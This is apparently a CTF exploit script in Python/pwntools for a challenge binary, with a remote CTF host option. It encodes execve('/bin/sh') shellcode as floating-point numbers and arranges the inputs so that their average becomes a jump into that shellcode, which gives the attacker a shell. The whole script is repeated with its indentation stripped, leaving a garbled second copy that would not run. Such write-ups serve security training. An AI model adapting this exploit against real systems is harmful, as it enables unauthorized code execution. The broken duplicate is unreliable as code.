PaulCher/exploit_hq_day6.py

## exploit_hq_day6.py
#!/usr/bin/env python

from pwn import *

context(os='linux', arch='amd64')

BINARY = './hq2017_task6_m116'

def generate_shellcode():
    c1 = '\x6a\x68\x90\xbaAAAA'
    c2 = '\xb8\x2f\x62\x69\x6e\xbaAA'
    c3 = 'AA\x90\xbaAAAA'
    c4 = '\xbb\x2f\x2f\x2f\x73\xbaAA'
    c5 = 'AA\x48\xc1\xe3\x20\xbaA'
    c6 = 'AAA\x48\x01\xd8\xbaA'
    c7 = 'AAA\x50\xbaAAA'
    c8 = 'A\x48\x89\xe7\xbaAAA'
    c9 = 'A\x68\x73\x68\x00\x00\xbaA'
    c10 = 'AAA\x31\xf6\x56\xbaA'
    c11 = 'AAA\x6a\x08\x5e\xbaA'
    c12 = 'AAA\x48\x01\xe6\xbaA'
    c13 = 'AAA\x56\xbbAAA'
    c14 = 'A\x48\x89\xe6\xbbAAA'
    c15 = 'A\x31\xd2\x6a\x3b\xbbAA'
    c16 = 'AA\x58\x0f\x05AAA'

    cc = [c1, c2, c3, c4, c5, c6, c7, c8, c9, c10,c11, c12,c13,c14,c15, c16]

    for c in cc:
        print struct.unpack('d', c)[0]

def exploit():
    REMOTE = 0
    if REMOTE:
        r = remote('spbctf.ppctf.net', 5353)
    else:
        r = process(BINARY)

    f = [
    "2261635.4575319784", #shellcode
    "2323676.823308911",
    "2261635.45752731",
    "2323686.368627516",
    "438363073.2822457",
    "450363720.25490195",
    "2261876.6269914214",
    "2261877.8088770215",
    "436207720.45080954",
    "441906737.25490195",
    "442370154.25490195",
    "451281224.25490195",
    "2261878.6738664214",
    "2261879.8010645215",
    "2324086.834539563",
    "2261514.1198808257",
    "29301000821.275124",
                          # last values to make (sum(f) / len(f)) == asm("jmp [rsp+0x70]")
    "0",
    "2921082450",
    '1685813728.6539300419'
    ]

    r.sendline(str(len(f)))
    sleep(0.5)

    s = ' '.join(f)
    r.sendline(s)
    r.interactive()


if __name__ == '__main__':
    exploit()
	#!/usr/bin/env python

	from pwn import *

	context(os='linux', arch='amd64')

	BINARY = './hq2017_task6_m116'

	def generate_shellcode():
	c1 = '\x6a\x68\x90\xbaAAAA'
	c2 = '\xb8\x2f\x62\x69\x6e\xbaAA'
	c3 = 'AA\x90\xbaAAAA'
	c4 = '\xbb\x2f\x2f\x2f\x73\xbaAA'
	c5 = 'AA\x48\xc1\xe3\x20\xbaA'
	c6 = 'AAA\x48\x01\xd8\xbaA'
	c7 = 'AAA\x50\xbaAAA'
	c8 = 'A\x48\x89\xe7\xbaAAA'
	c9 = 'A\x68\x73\x68\x00\x00\xbaA'
	c10 = 'AAA\x31\xf6\x56\xbaA'
	c11 = 'AAA\x6a\x08\x5e\xbaA'
	c12 = 'AAA\x48\x01\xe6\xbaA'
	c13 = 'AAA\x56\xbbAAA'
	c14 = 'A\x48\x89\xe6\xbbAAA'
	c15 = 'A\x31\xd2\x6a\x3b\xbbAA'
	c16 = 'AA\x58\x0f\x05AAA'

	cc = [c1, c2, c3, c4, c5, c6, c7, c8, c9, c10,c11, c12,c13,c14,c15, c16]

	for c in cc:
	print struct.unpack('d', c)[0]

	def exploit():
	REMOTE = 0
	if REMOTE:
	r = remote('spbctf.ppctf.net', 5353)
	else:
	r = process(BINARY)

	f = [
	"2261635.4575319784", #shellcode
	"2323676.823308911",
	"2261635.45752731",
	"2323686.368627516",
	"438363073.2822457",
	"450363720.25490195",
	"2261876.6269914214",
	"2261877.8088770215",
	"436207720.45080954",
	"441906737.25490195",
	"442370154.25490195",
	"451281224.25490195",
	"2261878.6738664214",
	"2261879.8010645215",
	"2324086.834539563",
	"2261514.1198808257",
	"29301000821.275124",
	# last values to make (sum(f) / len(f)) == asm("jmp [rsp+0x70]")
	"0",
	"2921082450",
	'1685813728.6539300419'
	]

	r.sendline(str(len(f)))
	sleep(0.5)

	s = ' '.join(f)
	r.sendline(s)
	r.interactive()


	if __name__ == '__main__':
	exploit()